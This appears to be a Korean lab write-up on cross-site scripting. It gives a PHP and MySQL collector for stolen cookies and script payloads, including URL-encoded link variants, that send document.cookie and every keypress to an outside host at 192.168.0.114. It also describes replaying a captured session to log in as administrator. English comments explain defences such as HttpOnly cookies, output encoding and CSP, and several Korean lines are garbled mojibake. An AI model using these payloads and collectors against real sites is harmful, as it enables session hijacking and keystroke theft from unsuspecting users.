
XSS 공격 - 세션 값, 키 로깅

# 세션 값 받을 데이터베이스 생성
-- Lab schema behind the capture endpoint described in this write-up:
-- one row per request that arrives carrying a `data` value.
CREATE DATABASE xss_attack;
USE xss_attack;

CREATE TABLE session_list (
    -- DATE keeps the calendar day only; the time-of-day part of the now()
    -- value written by the inserting script is not retained.
    date    DATE,
    -- 15 characters holds a dotted-quad IPv4 address and nothing longer.
    ip      VARCHAR(15),
    -- Raw cookie string as received. The write-up shows such a value being
    -- replayed as a login, so these rows are as sensitive as passwords.
    session VARCHAR(50)
);
# 세션 값 리스트 생성
<?php
    // Collector endpoint for the lab: stores the `data` query parameter together
    // with the caller's address in xss_attack.session_list.
    // NOTE(review): connects as root with the password in source; a dedicated
    // account limited to INSERT on this one table is the least-privilege setup.
    $db_conn = new mysqli("127.0.0.1","root","apmsetup","xss_attack");

    // Request-controlled value, read without an isset() check: a request that
    // lacks `data` raises an undefined-index notice/warning before the empty() test.
    $session = $_GET["data"];
    // Address of the connecting client as reported by the web server.
    $remote_ip = $_SERVER["REMOTE_ADDR"];

    if(!empty($session)){
        // NOTE(review): $session is placed into the SQL text unescaped, so this
        // endpoint is itself open to SQL injection by anyone who can reach it.
        // Binding the values through a prepared statement closes that hole.
        // The INSERT has no column list and relies on the table's column order.
        $query = "insert into session_list values(now(), '{$remote_ip}', '$session')";
        $db_conn->query($query);
    }
?>

 

세션 리스트가 쌓이는 것 확인

 

XSS 공격 시행

# ip 부분에 자신의 ip 입력
<!-- XSS test string from the write-up: when a page renders it unescaped, the browser is sent to the collector URL with document.cookie appended as `data`. Cookies set with the HttpOnly attribute are not visible to document.cookie, and HTML-encoding post content on output keeps the tag from running. -->
<script>location.href="http://192.168.0.114/session.php?data="+document.cookie</script>

๋ฐ›์•„์˜ค๊ฒŒ๋œ ์„ธ์…˜ ๊ฐ’ ํ™•์ธ
์„ธ์…˜ ๊ฐ’ ๋ถ™์—ฌ ๋„ฃ๊ธฐ ํ›„ ์ƒˆ๋กœ๊ณ ์นจ
๊ด€๋ฆฌ์ž ์•„์ด๋””๋กœ ๋กœ๊ทธ์ธ ์™„๋ฃŒ

<!-- Link variants that carry the same script in the `value` parameter of the xssboard error page (presumably echoed back unescaped; confirm against the lab app). new Image().src issues the request in the background, so the page does not navigate away. The second and third lines are the percent-encoded form of the same script. On the application side, HTML-encoding `value` before output and a Content-Security-Policy that disallows inline script address all of them. -->
<a href="http://192.168.0.114/xssboard/index.php?page=error&value=<script>new Image().src="http://192.168.0.114/session.php?data="+document.cookie</script>>๋ฐ”๋กœ๊ฐ€๊ธฐ<a>

<script>new+Image().src%3d"http%3a//192.168.0.114/session.php%3fdata%3d"%2bdocument.cookie</script>

<a href="http://192.168.0.114/xssboard/index.php?page=error&value=<script>new+Image().src%3d"http%3a//192.168.0.114/session.php%3fdata%3d"%2bdocument.cookie</script>>๋ฐ”๋กœ๊ฐ€๊ธฐ<a>

 

key Logging
๋ˆ„๋ฅด๋Š” key๋“ค์„ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค๋กœ ๋ฐ›์•„์˜จ๋‹ค

 

# keylogging
-- Storage for the key-logging demo: the receiving script keeps one row per
-- client IP and appends each reported key to `data`.
CREATE TABLE key_logging (
    date DATE,          -- calendar day only, set when the row is first inserted
    ip   VARCHAR(15),   -- caller address; sized for dotted-quad IPv4
    data TEXT           -- concatenation of every key value received from that IP
);
# key logging 실행 구문
<?php
    // Receiver for the key-logging demo: appends each reported key to the row
    // belonging to the caller's IP address in xss_attack.key_logging.
    // NOTE(review): root credentials are hard-coded in source; a dedicated
    // low-privilege account for this one table is the least-privilege setup.
    $db_conn=new mysqli("127.0.0.1", "root", "apmsetup", "xss_attack");
    // The request value is escaped for use inside a quoted SQL string literal.
    $key = $db_conn->real_escape_string($_GET["data"]);
    // Address of the connecting client as reported by the web server.
    $remote_ip = $_SERVER["REMOTE_ADDR"];

    if(!empty($key)){
        // Look up whether this address already has a row.
        $query = " SELECT * FROM key_logging where ip='{$remote_ip}'";

        // NOTE(review): the result is used without a failure check; if query()
        // returns false, reading ->num_rows on it raises an error.
        $tmp = $db_conn->query($query);
        $cnt = $tmp->num_rows;

        if($cnt==0){
            // First value from this address: create the row.
            $query="INSERT INTO key_logging VALUES(now(),'{$remote_ip}','{$key}')";

        }else{
            // Later values: append to the text already stored for this address.
            $query = "UPDATE key_logging SET data=concat(data,'{$key}') WHERE ip='{$remote_ip}'";
        }
        $db_conn->query($query);
    }
    $db_conn -> close();
?>

 

<!-- Key-logging demo script from the write-up: a document-wide keypress handler. -->
<script>document.onkeypress=function(a){
	// Debug popup: shows every pressed key to the person typing.
	alert(a.key); 
    // `key` is assigned without var/let, so it becomes a global variable.
    key=encodeURI(a.key); 
    // The Enter key is recorded as the marker "(E)".
    if(key=="Enter"){
    key="(E)";
    } 
    // One image request per key press carries the value to the receiver. In proxy or
    // web-server logs this shows up as a burst of GETs to keylogging.php with a very short
    // `data` parameter; a CSP img-src allow-list that omits the receiving host blocks the request.
    new Image().src="http://192.168.0.114/keylogging.php?data="+key;
    }
</script>


<!-- The same handler as the multi-line listing on this page, collapsed onto one line. It runs only where the page outputs it unescaped; HTML-encoding post content on output, or a Content-Security-Policy that disallows inline script, prevents that. -->
<script>document.onkeypress=function(a){alert(a.key); key=encodeURI(a.key); if(key=="Enter"){key="(E)";}new Image().src="http://192.168.0.114/keylogging.php?data="+key;}</script>

 

key logging ๊ฒŒ์‹œ๋ฌผ์— ๋“ค์–ด๊ฐ”์„ ๋•Œ
๋œธ
๋ˆ„๋ฅธ key data๋“ค์ด ๋‚˜์˜จ๋‹ค.

 

๋ฐ˜์‘ํ˜•
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.